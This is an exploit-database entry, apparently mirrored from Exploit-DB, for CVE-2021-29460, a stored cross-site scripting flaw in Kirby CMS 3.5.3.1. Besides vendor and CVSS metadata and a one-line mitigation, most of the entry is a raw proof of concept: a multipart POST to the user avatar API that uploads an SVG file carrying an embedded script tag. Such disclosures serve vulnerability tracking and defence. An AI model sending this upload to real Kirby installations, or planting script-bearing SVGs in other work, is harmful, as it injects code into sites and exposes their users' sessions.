Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS)

vendor:

Kirby CMS

by:

Sreenath Raghunathan

5.4

CVSS

MEDIUM

Cross-Site Scripting (XSS)

CWE

Product Name: Kirby CMS

Affected Version From: 3.5.3.1

Affected Version To: 3.5.3.1

Patch Exists: YES

Related CWE: CVE-2021-29460

CPE: a:getkirby:kirby:3.5.3.1

Metasploit:

Other Scripts:

Platforms Tested:

2021

Kirby CMS 3.5.3.1 – ‘file’ Cross-Site Scripting (XSS)

This exploit allows an attacker to inject malicious code into the 'file' parameter of the Kirby CMS API, leading to Cross-Site Scripting (XSS) attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before processing it.

Source

Exploit-DB raw data:

# Exploit Title: Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS)
# Date: 21-04-2021
# Exploit Author: Sreenath Raghunathan
# Vendor Homepage: https://getkirby.com/
# Software Link: https://github.com/getkirby/kirby
# Version: 3.5.3.1(REQUIRED)
# CVE : CVE-2021-29460

POST /api/users/<userid>/avatar HTTP/1.1
Host: <host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF: <redacted>
Content-Type: multipart/form-data;
boundary=---------------------------286121627839893676321700902916
Content-Length: 563

Connection: close
Cookie:
<redacted>



-----------------------------286121627839893676321700902916
Content-Disposition: form-data; name="file"; filename="svgxss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,500 500,0" fill="#009900"
stroke="#004400"/>
  "><script>alert(1)</script>
</svg>
-----------------------------286121627839893676321700902916--